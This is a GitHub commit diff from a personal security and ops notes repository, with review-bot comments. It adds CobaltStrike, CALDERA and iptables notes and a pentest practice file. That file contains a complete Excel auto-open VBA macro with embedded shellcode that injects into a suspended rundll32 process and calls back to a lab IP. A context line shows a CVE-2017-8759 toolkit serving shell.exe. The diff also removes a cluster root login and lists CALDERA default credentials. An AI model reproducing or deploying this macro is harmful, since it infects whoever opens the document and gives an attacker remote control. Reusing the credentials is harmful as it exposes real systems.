
Commit

Merge pull request #5 from JamesBonddu/protocol-tcp
Protocol tcp
JamesBonddu authored May 10, 2019
2 parents 36a3eca + 915af9f commit ded703c
Showing 14 changed files with 424 additions and 35 deletions.
37 changes: 3 additions & 34 deletions 大数据/docker开发/docker.md
Expand Up @@ -58,7 +58,7 @@ bash-4.4# cat /hbase/conf/hbase-site.xml
</property>
<property>
<name>hbase.zookeeper.quorum</name>
<value>10.255.175.79</value> !!!!改为宿主机IP
<value>ip</value> !!!!改为宿主机IP
</property>
<property>
<name>hbase.zookeeper.property.clientPort</name>
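Review bot: the replacement on the `<value>ip</value>` line is easy to mistake for a literal, because the trailing comment `!!!!改为宿主机IP` is the only hint that it is a placeholder; use an unmistakable token such as `<value>HOST_IP</value>` so nobody pastes `ip` into hbase-site.xml as-is. Scrubbing the address from the working tree also does not remove it from the repository: the removed line `<value>10.255.175.79</value>` stays reachable from parent 36a3eca, so treat this (and the matching `/etc/hosts` edit in the next hunk) as cleanup of the current text rather than as having un-published the address.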
Expand All @@ -75,7 +75,7 @@ java.io.IOException: Could not find my address: master in list of ZooKeeper quor
#修改宿主机的/etc/hosts
10.255.175.79 master
ip master
```


Expand Down Expand Up @@ -184,21 +184,6 @@ iptables -t nat -A DOCKER -p tcp --dport 2182 -j DNAT --to-destination 172.17.0



10.255.84.89 集群

root

123///

192.168.111.145 - 150

http://10.255.84.89:8080/#/login



https://blog.csdn.net/birdben/article/details/51794427





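Review bot: the removed lines `root` and `123///` next to `10.255.84.89 集群`, together with the `http://10.255.84.89:8080/#/login` URL, read as a username, password and login endpoint for an internal cluster. Deleting them is the right call, but they remain in history (parent 36a3eca), so the credential should be rotated and the history rewritten, or the repository treated as having exposed it. The commit message `Protocol tcp` says nothing about secrets being removed, which makes this hard to find in a later audit; mention it explicitly.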
Expand Down Expand Up @@ -229,21 +214,5 @@ https://blog.csdn.net/birdben/article/details/51794427
[kafka Doc](https://kafka.apache.org/quickstart)



TODO:

深入了解iptables

深入了解HBase

深入了解Kafka



Task:

1. HBase 数据绑定磁盘
2. Phon


[docker logs日志记录](https://www.ibm.com/developerworks/community/blogs/132cfa78-44b0-4376-85d0-d3096cd30d3f/entry/Docker_%E5%A6%82%E4%BD%95%E6%94%AF%E6%8C%81%E5%A4%9A%E7%A7%8D%E6%97%A5%E5%BF%97%E6%96%B9%E6%A1%88_%E6%AF%8F%E5%A4%A95%E5%88%86%E9%92%9F%E7%8E%A9%E8%BD%AC_Docker_%E5%AE%B9%E5%99%A8%E6%8A%80%E6%9C%AF_88?lang=en)

5 changes: 5 additions & 0 deletions 安全技能树/安全信息资源/博客资源.md
@@ -0,0 +1,5 @@
# 博客资源

参考:

[micro8](https://micro8.gitbook.io/micro8/)
57 changes: 57 additions & 0 deletions 安全技能树/安全信息资源/安全工具/CobaltStrike.md
@@ -0,0 +1,57 @@
# CobaltStrike

## 侦察 Reconnaissance
利用 System profile系统分析器发现目标系统的客户端应用程序.

## 后渗透 Post Exploitation
Beacon是CobaltStrike的有效载荷,可用来执行powershell脚本,记录键盘,截图屏幕,下载文件,生成其他有效负载等.

## 攻击包 Attack Packages

将文件转换为木马:
- Java Applet攻击
- Microsoft Office文档
- Microsoft Windows程序
- 网站克隆工具

## 隐蔽沟通 Covert Communication
信标的网络指标具有可塑性.加载C2配置文件使其看起来像另一个攻击者.使用HTTP,HTTPS,和DNS去egress a network.通过SMB协议,使用命名管道去控制信标,点对点.

## 鱼叉网络钓鱼

发送钓鱼邮件

## 浏览器透视
使用浏览器数据透视图以双因素身份验证和访问网站作为目标.

## 合作

连接到 teamserver共享数据,实时通讯以及参与过程中控制受到危害的系统.

## 报告和记录

根据红队的活动提供一个时间表和指标单,这些报告旨在使我们的同行在安全运营中收益。可以导出为PDF和MS Word.

信标的HTTP指标由Malleable C2配置文件控制.它指定如何转换数据并将其存储在事务中.转换和存储数据的相同配置文件也可以从事务中提取和恢复数据。

```sh
# 启动时指定配置文件
./teamserver [外部IP] [密码] [/path/to/my.profile]
# c2lint检查通信配置文件的语法,应用一些额外的检查甚至随机数据对配置文件进行单元测试.
./c2lint [/path/to/my.profile]

# 配置文件参考
https://github.com/rsmudge/Malleable-C2-Profiles
```

参考:

[cobaltstrike](https://www.cobaltstrike.com/)

[CobaltStrike 安装](https://blog.csdn.net/qq_36374896/article/details/83961496)

[cobaltstrike 安装破解教程](https://www.cnblogs.com/haq5201314/p/7040832.html)

[DLL Hijacking 和 COM Hijacking Bypass UAC](https://zhuanlan.zhihu.com/p/55025929)

[Malleable Command and Control](https://www.cobaltstrike.com/help-malleable-c2)
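Review bot: the `sh` block ends with a bare URL line, `https://github.com/rsmudge/Malleable-C2-Profiles`, that is not a command; anyone pasting the block executes it as one, so prefix it with `# ` or move it into the `参考:` list with the other links. Two smaller points in this hunk: the `./teamserver [外部IP] [密码] [/path/to/my.profile]` line would benefit from a note that the password is shared by every operator who connects and is passed on the command line, where shell history and process listings retain it; and `egress a network` in the 隐蔽沟通 paragraph is left untranslated mid-sentence.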
9 changes: 9 additions & 0 deletions 安全技能树/安全信息资源/安全工具/Mimikatz.md
@@ -0,0 +1,9 @@
# Mimikatz

参考:

[github Mimikatz](https://github.com/gentilkiwi/mimikatz/wiki)

[wooyun Mimikatz](https://wooyun.js.org/drops/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part3.html)

[Mimikatz 命令参考](https://paper.seebug.org/papers/Archive/drops2/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part2.html)
45 changes: 44 additions & 1 deletion 安全技能树/安全信息资源/黑客工具资源.md
Expand Up @@ -11,6 +11,49 @@ adversary emulation, 模拟攻击提供了一种用来测试网络在应对高

[攻击模拟](https://www.4hou.com/web/11241.html)

### CALDERA

CALDERA专注于后渗透阶段.它包含一个逻辑编码,用于描述该技术的要求(前置条件)和技术的效果(后置条件).
对手仿真的核心是red team,但是对手仿真不是使用攻击者的一般心态,而是采用特定现实世界对手的方法,参与的重点是让仿真团队和防御者共同努力改进系统,网络和防御过程,以更好地检测对手生命周期中使用的技术.

限制: 1.决定不模仿C2,原因是已经存在几种模拟C2网络流量的工具.通过关注仿真的其他方面产生更大的影响.
- 实用角度: CALDERA最初是为测试基于主机的防御和传感器而创建的.基于主机的防御主要使用主机上的活动而不是网络上的。
- 哲学角度: C2协议很容易改变,且由很多变化,不同的差异会很大.

```sh
git clone https://github.com/mitre/caldera.git --recursive
docker-compose up
```

默认账户密码
username: admin
password: caldera

Logic是CALDERA能够自动运行的核心部分.每一个敌手动作,称为步骤在CALDERA包含的步骤的要求和影响的逻辑描述.
CALDERA解析这些逻辑描述,以告知何时可以运行Step并预测Ste的结果.这让CALDERA通过迭代检测给定当前状态的那些步骤是可以执行的,选择步骤,然后根据逻辑规则生成该步骤的输出状态来生成[计划][planning]

[caldera](https://caldera.readthedocs.io/en/latest/)

[docker-compose install](https://docs.docker.com/compose/install/)

[caldera install](https://caldera.readthedocs.io/en/latest/installation.html)

[AI planning](https://www.isi.edu/~blythe/cs541/)


## HIDS

OSSEC分为三部分:
Manager(or Server): Agents通过1514/udp端口连接Server,agents可以通过这个端口和server沟通.
Agents


参考:

[ossec-hids github](https://github.com/ossec/ossec-hids)

[ossec doc](http://www.ossec.net/docs/index.html)

## CTF 夺旗赛

[CTF 夺旗赛资源](https://ctftime.org/)
[CTF 夺旗赛资源](https://ctftime.org/)
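Review bot: the `默认账户密码` / `username: admin` / `password: caldera` lines document CALDERA's default login right after `docker-compose up` without saying that this brings the web UI up with those credentials; add a sentence that they must be changed before the container is reachable from anything but localhost, since a CALDERA server by design dispatches actions to its agents. Other points in the same hunk: the last `[CTF 夺旗赛资源](https://ctftime.org/)` line is duplicated (most likely the old final line without a trailing newline plus the re-added one; keep one); `Ste` in `预测Ste的结果` should be `Step`; `由很多变化` should be `有很多变化`; the reference-style link `[计划][planning]` has no `[planning]:` definition anywhere in the hunk, so it renders as literal brackets; and the `## HIDS` section lists `Agents` as a component with no description, while the Manager line mentions `1514/udp` but not what the Manager does with that port.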
98 changes: 98 additions & 0 deletions 安全技能树/渗透测试/Practice/实战1.md
Expand Up @@ -50,4 +50,102 @@ Final size of exe file: 7168 bytes
#监听来自ppsx文件执行之后反弹的shell。
#命令:python cve-2017-8759_toolkit.py -M exp -e http://192.168.72.3/shell.exe -l /root/8759shell.exe
```
## EXCEL 设置PAYLOAD宏病毒,
[XLSM 启用宏](https://jingyan.baidu.com/article/90895e0ff08e1864ec6b0be9.html)
```vb
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84, _
60,97,124,2,44,32,-63,-49,13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48, _
80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1,-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3, _
125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4,-117,1,-48,-119,68,36,36,91, _
91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,-24,-128,0,0,0,77,111,122,105,108,108,97,47,52,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,55,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,48,41,0,88,88,88,88,88,88,88, _
88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
88,88,88,88,88,0,89,49,-1,87,87,87,87,81,104,58,86,121,-89,-1,-43,-21,121,91,49,-55,81,81,106,3,81,81, _
104,-41,17,0,0,83,80,104,87,-119,-97,-58,-1,-43,-21,98,89,49,-46,82,104,0,2,96,-124,82,82,82,81,82,80,104, _
-21,85,46,59,-1,-43,-119,-58,49,-1,87,87,87,87,86,104,45,6,24,123,-1,-43,-123,-64,116,68,49,-1,-123,-10,116,4, _
-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104,-73,87,-32, _
11,-1,-43,-65,0,47,0,0,57,-57,116,-68,49,-1,-21,21,-21,73,-24,-103,-1,-1,-1,47,74,78,81,115,0,0,104,-16, _
-75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,83,83,-119,-25,87,104, _
0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116,-51,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,55,-1,-1,-1, _
49,57,50,46,49,54,56,46,55,49,46,51,0)
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
```
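Review bot: the `myArray = Array(...)` block commits a raw binary stage into a Markdown note with no description of what it is, how it was generated, or where it connects; the trailing bytes `49,57,50,46,49,54,56,46,55,49,46,51,0` are the string `192.168.71.3`, so the file hardcodes a lab callback address and is not reusable as documentation anyway. Record the generator command and options in prose and keep the bytes out of the repository (at minimum replace the address bytes with a placeholder), as the other hunks in this PR already do for internal IPs. Smaller points: the heading `## EXCEL 设置PAYLOAD宏病毒,` ends with a stray comma and has no blank line between it and the preceding closing fence, so some renderers will not treat it as a heading; `lpCurrentDriectory` in the non-VBA7 `RunStuff` declaration is misspelled (harmless in a `Declare`, but inconsistent with the VBA7 branch); and the `[XLSM 启用宏]` link is the only explanation offered for the whole section. For the write-up itself, the defensive angle is worth one paragraph: Excel launching `rundll32.exe` with `dwCreationFlags` of `4&` (suspended), a `VirtualAllocEx` with `&H40` (RWX) and a `CreateRemoteThread` into that process is the classic Office process-injection chain that EDR rules and Sysmon event 8 key on, which is the main lesson a reader should take from this sample.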
9 changes: 9 additions & 0 deletions 常用命令/系统常用命令/Linux/Linux常用命令.md
Expand Up @@ -6,8 +6,15 @@ iptables -I INPUT -p tcp -s ip --dport port -j ACCEPT
# 添加默认路由
route add -net 0.0.0.0/24 gw 192.168.18.2 em1
route del default gw 192.168.18.2 # 删除默认路由
# 删除路由规则链
iptables -F chainname

# 添加NAT规则
iptables -A nat -s 10.255.175.76 -p tcp --dport 8880 -j ACCEPT
```

[iptables](http://www.zsythink.net/archives/1199)

## 访问socket

```json
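Review bot: the two added iptables lines do not do what their comments claim. `iptables -F chainname` under `# 删除路由规则链` flushes every rule in an iptables chain of the filter table; it has nothing to do with routes, and without `-t` it silently targets the filter table only. `iptables -A nat -s 10.255.175.76 -p tcp --dport 8880 -j ACCEPT` under `# 添加NAT规则` uses `nat` as a chain name, not a table; unless a user-defined chain called `nat` exists the command fails with `No chain/target/match by that name`, and `-j ACCEPT` performs no address translation in any case. A NAT rule is `iptables -t nat -A <chain> ... -j DNAT|SNAT|MASQUERADE`; a plain allow rule belongs in the filter table like the `iptables -I INPUT -p tcp -s ip --dport port -j ACCEPT` line at the top of the same block, which is probably what was intended. The line also hardcodes `10.255.175.76` while docker.md in this same PR replaces that range with a placeholder; do the same here. Unchanged context, but worth fixing while in the file: the `## 访问socket` block is fenced as ```json although it holds `socat` shell commands.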
Expand All @@ -25,6 +32,8 @@ socat -d -d TCP-LISTEN:8080,fork UNIX /

[/how-to-access-unix-domain-sockets-from-the-command-line](https://stackoverflow.com/questions/27195677/how-to-access-unix-domain-sockets-from-the-command-line)

[ss和 netstat区别](https://www.cnblogs.com/kevingrace/p/6211509.html)

## curl
```sh
# curl发送json
55 changes: 55 additions & 0 deletions 常用命令/系统常用命令/Linux/iptables.md
@@ -0,0 +1,55 @@
# iptables

iptables其实不是真正的防火墙,可以把它看作一个客户端代理,用户通过iptables这个代理,将用户的安全设定执行到对于的安全框架(netfliter)中; 虽然使用"service iptables start启动iptables '服务' ",但其实准确的说,iptables没有一个守护进程,所以不能算真正意义上的服务,而称为内核提供的功能更佳.

(1). netfilter 位于内核空间(kernelspace),是防火墙的安全框架.
(2). iptables 是一个命令行工具,位于用户空间(userspace),它使插入、修改和除去信息包过滤表中的规则变得容易。

Netfliter的功能有:
- 网络地址转换(NAT)
- 数据包修改
- 数据包过滤

当客户端访问服务器的web服务时,客户端发送报文到网卡,而tcp/ip协议栈是属于内核的一部分,所以客户端的信息会通过内核的TCp协议传输到用户空间中的web服务中,而此时,客户端报文的目标终点是web服务器监听的套接字(IP:port).

当web服务器响应客户端请求时,发出响应报文的(IP:port)则成为了客户端,再经过内核空间流经网卡发出请求.

位于内核空间的Netfliter,所有报文的进出都要通过这些"关卡",而这些关卡在iptables称为"链".`5链4表`

![iptables-chains](../images/iptables-chains.png)

## 规则、表和链

1. 规则(rules)

规则(rules)其实就是网络管理员预定义的条件,规则一般的定义为“如果数据包头符合这样的条件,就这样处理这个数据包”。规则存储在内核空间的信息包过滤表中,这些规则分别指定了源地址、目的地址、传输协议(如TCP、UDP、ICMP)和服务类型(如HTTP、FTP和SMTP)等。当数据包与规则匹配时,iptables就根据规则所定义的方法来处理这些数据包,如放行(accept)、拒绝(reject)和丢弃(drop)等。配置防火墙的主要工作就是添加、修改和删除这些规则。
2. 链(chains)

链(chains)是数据包传播的路径,每一条链其实就是众多规则中的一个检查清单,每一条链中可以有一条或数条规则。当一个数据包到达一个链时,iptables就会从链中第一条规则开始检查,看该数据包是否满足规则所定义的条件。如果满足,系统就会根据该条规则所定义的方法处理该数据包;否则iptables将继续检查下一条规则,如果该数据包不符合链中任一条规则,iptables就会根据该链预先定义的默认策略来处理数据包。

3. 表(tables)

表(tables)提供特定的功能,iptables内置了4个表,即raw表、filter表、nat表和mangle表,分别用于实现包过滤,网络地址转换和包重构的功能。

![iptables-table](../images/iptables-table.jpg)

> RAW 表; iptable_raw 关闭nat表上启用的连接追踪机制
只使用在PREROUTING链和OUTPUT链上,因为优先级最高,从而可以对收到的数据包在连接跟踪前进行处理。一但用户使用了RAW表,在 某个链上,RAW表处理完后,将跳过NAT表和 ip_conntrack处理,即不再做地址转换和数据包的链接跟踪处理了

> filter 表; iptables_filter 负责过滤功能
主要用于过滤数据包,该表根据系统管理员预定义的一组规则过滤符合条件的数据包。对于防火墙而言,主要利用在filter表中指定的规则来实现对数据包的过滤。Filter表是默认的表,如果没有指定哪个表,iptables 就默认使用filter表来执行所有命令,filter表包含了INPUT链(处理进入的数据包),RORWARD链(处理转发的数据包),OUTPUT链(处理本地生成的数据包)在filter表中只能允许对数据包进行接受,丢弃的操作,而无法对数据包进行更改

> NAT;iptable_nat 网络地址转换(network address translation)
NAT(NetWork Address Translation)
SNAT: (POSTROUTING,修改即将出去的包.修改的是来源IP,故称为Source NAt,SNAT)
DNAt: (PREROUTING,修改得到是即将到来的数据包.修改的是目的IP,故称为Destination NAt,DNAT)

> mangle表; iptable_mangle 拆解报文,做出修改并重新封装.
参考:

[iptables详解](https://blog.csdn.net/reyleon/article/details/12976341)

[iptables 分析](http://www.zsythink.net/archives/1199)
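Review bot: `RORWARD链` in the filter-table paragraph should be `FORWARD链`, and `Netfliter` (three occurrences) should be `netfilter`; both are names a reader will search for. Further corrections in the same hunk: `对于的安全框架` should be `对应的安全框架`, `TCp协议` should be `TCP/IP协议栈` to match the sentence before it, `Source NAt`/`DNAt` should be `SNAT`/`DNAT`, and the mangle-table line runs straight into `参考:` without a blank line, so the reference list renders as part of that block quote. Content-wise, the raw-table sentence `关闭nat表上启用的连接追踪机制` attributes connection tracking to the nat table; conntrack is a separate netfilter module that nat depends on, and what the raw table actually offers is a place to mark packets (`-j NOTRACK` / `-j CT --notrack`) so they are never tracked, which the next sentence already describes correctly. The nat section lists only PREROUTING and POSTROUTING, but the nat table also has an OUTPUT chain for locally generated packets; with `5链4表` stated above, the reader will expect the enumeration to add up.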

0 comments on commit ded703c
